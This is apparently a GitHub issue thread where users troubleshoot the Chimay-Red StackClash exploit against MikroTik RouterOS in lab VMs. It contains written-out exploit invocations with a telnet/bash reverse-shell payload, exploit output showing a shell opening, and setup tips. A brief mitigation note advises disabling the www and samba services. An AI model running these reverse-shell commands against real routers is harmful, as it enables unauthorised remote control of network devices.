Cannot get shell -> Miktotik 6.37.5

[N0ur5]

Hello,

I am new to GitHub with minimal development/"programming" experience, so my apologies if this is not the correct approach to getting help with this.

I can't seem to get a meterpreter shell or get a callback to netcat(nc), using the notes you provided with this exploit/POC.

I downloaded and installed the firmware for Mikrotik 6.37.5 onto a virtual machine. I have ensured port 80 is open on the device. I am also running Kali on another virtual machine. The devices can ping each other.

I have tried mips and x86 exploits and although the results in the terminal tell me that the exploit was complete, and payload delivered, I do not get a callback to either metasploit handler or netcat. I have tried both python 2.7 as well as 3.6. When I use TCPdump from Kali to get some additional information when running the exploit, I see my machine reach out to the Mikrotik and at one point a HTTP 200 OK message. So I know the initial conversation between the machines opens up. Not long after the payload is sent I see two responses from the Mikrotik. One is a HTTP 400 bad request, and the other is HTTP 500 internal server error.

I seem to be stuck. Is there any guidance or advice you can provide? Is this version perhaps not vulnerable dispite the release notes saying versions up to 3.38.4 are vulnerable? Or maybe I'm doing something wrong? I can provide more information if needed as well. I just would appreciate help as I love researching things in the cybersecurity, pentesting, and hacking.

Thank you very much for your time, N0ur5

[BigNerd95]

If you are testing RouterOS in a VM then you have to use the x86 version only. The x86 exploit is made using pwntools, so you have to use python2, not python3. I advice to run my scripts ./StackClash.py and not python2 StackClash.py, because they have the shebang in the first line, so the correct version of python is automatically launched. Are you able to see the web page (webfig) from the kali vm? Did you extract the right version of www?

[N0ur5]

Thank you for the reply, I was trying both MIPS and x86 before. Now I am just trying the x86 as per your guidance. I also am running it by just calling the script rather than specifying a version of python. I am able to see webfig from Kali in Firefox. I did extract the correct www using ./getROSbin.py 6.37.5 x86 /nova/bin/www www_binary.

On one shell in Kali I ran nc -l -p 4444

On the other shell on Kali I ran ./StackClashx86.py {Mikrotik IP}_ 80 wwwbinary "/bin/mknod /ram/f p; /bin/telnet {Kali IP}_ 4444 < /ram/f | /bin/bash > /ram/f 2>&1"

[BigNerd95]

If you use '/nova/bin/info "/system reboot" ' as StackClash command Does the router reboot?

[N0ur5]

I tried ./StackClash_x86.py {Mikrotik IP} 80 www_binary "nova/bin/info '/system reboot'" and the router did not reboot sadly.

[BigNerd95]

So you have to root your vm and debug it Sorry but i have not enough time to test all versions for anyone

[N0ur5]

I completely understand. Thank you for your time BigNerd95.

[BigNerd95]

Thank you for understanding If you are able to fix it then send a pull request ;)

[N0ur5]

Sounds like a plan 👍 :)

[BigNerd95]

https://github.com/BigNerd95/Chimay-Red/blob/master/README.md

[beeterman]

do will work with /getROSbin.py 5.21 x86 /nova/bin/www www_binary

5.21 x86 or only version 6.x

[BigNerd95]

I didn't test version 5.x Another researcher told me that version 5.x is not multithreaded So it shouldn't work

[beeterman]

still have problem in kali 64 ./StackClash_mips.py mikrotik ip 80 www_binary "/bin/mknod /ram/f p; /bin/telnet kali ip 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Traceback (most recent call last): File "./StackClash_mips.py", line 14, in from ropper import RopperService ModuleNotFoundError: No module named 'ropper' I created today new issue but do not find in

please can help me how sole ropper

[BigNerd95]

Google it

[N0ur5]

@beeterman you need to download the ropper module from GitHub and extract it to folder with stackclash script. This is the easiest way at least.

[BigNerd95]

pip3 install ropper ...

[N0ur5]

Yes or that haha.

[BigNerd95]

https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#working-exploits

[beeterman]

finally ./getROSbin.py 6.37.3 mipsbe /nova/bin/www www_binary Downloading firmware... Extracting /nova/bin/www /nova/bin/www saved as www_binary

and run nc -l -p 4444

./StackClash_mips.py mikrotik ip 80 www_binary "/bin/mknod /ram/f p; /bin/telnet kali ip 4444 < /ram/f | /bin/bash > /ram/f 2>&1" Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Error sending data

what problem err sending ?

[BigNerd95]

Mmmm Does it always crash in this manner?

[BigNerd95]

@N0ur5 I tried 6.37.2 and 6.37.3 and it is working. I tested 6.37.5 and it is NOT working.. Maybe 6.37.5 is not working because it is a bugfix version (maybe there is something different in the code) I'll investigate

[R-ealitY]

@BigNerd95 really, with version 6.37.5 (x86) not working

[BigNerd95]

I know

[BigNerd95]

Maybe it isnt working on all other bugfix versions too

[halekan]

@BigNerd95 if something different in the code with version 6.37.3 do will try fix it in next release of chimay red to make it working

[0x0kasaku]

I tried 6.38.4 X86 which is installed on VM.

On one shell root@kali:~/Desktop/Chimay-Red-master# ./StackClash_x86.py 192.168.100.105 80 www_binary-6.38.4-x86 "/bin/mknod /ram/f p; /bin/telnet 192.168.100.100 1234 < /ram/f | /bin/bash > /ram/f 2>&1" Building ROP chain... [+] Binary loaded [+] Loading gadgets, please wait... [+] Gadgets loaded ! The ROP chain is 1952 bytes long (32768 bytes available) Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

On another shell I ran root@kali:~# nc -l -p 1234 /bin/bash: Trying: not found /bin/bash: Connected: not found /bin/bash: Escape: not found

what's wrong?

[BigNerd95]

Nothing It is working Write "echo *" or "pwd"

[BigNerd95]

In the shell where you see

/bin/bash: Trying: not found
/bin/bash: Connected: not found
/bin/bash: Escape: not found

[0x0kasaku]

Thank you!!

[0x0kasaku]

If i don't want to update my Router iso, there is anyway to fix the bug??

[BigNerd95]

Disable www service And samba too https://github.com/BigNerd95/Chimay-Blue

[0x0kasaku]

root@kali:~/Desktop/Chimay-Red-master/tools# python3 getROSbin.py 5.26 mipsbe /nova/bin/www www_5.26-mipsbe Downloading firmware... Extracting /nova/bin/www The file supplied is not a squashfs 4.0 image

Is there any way to get www binary from RouterOS 5.26 both x86 and mipsbe ?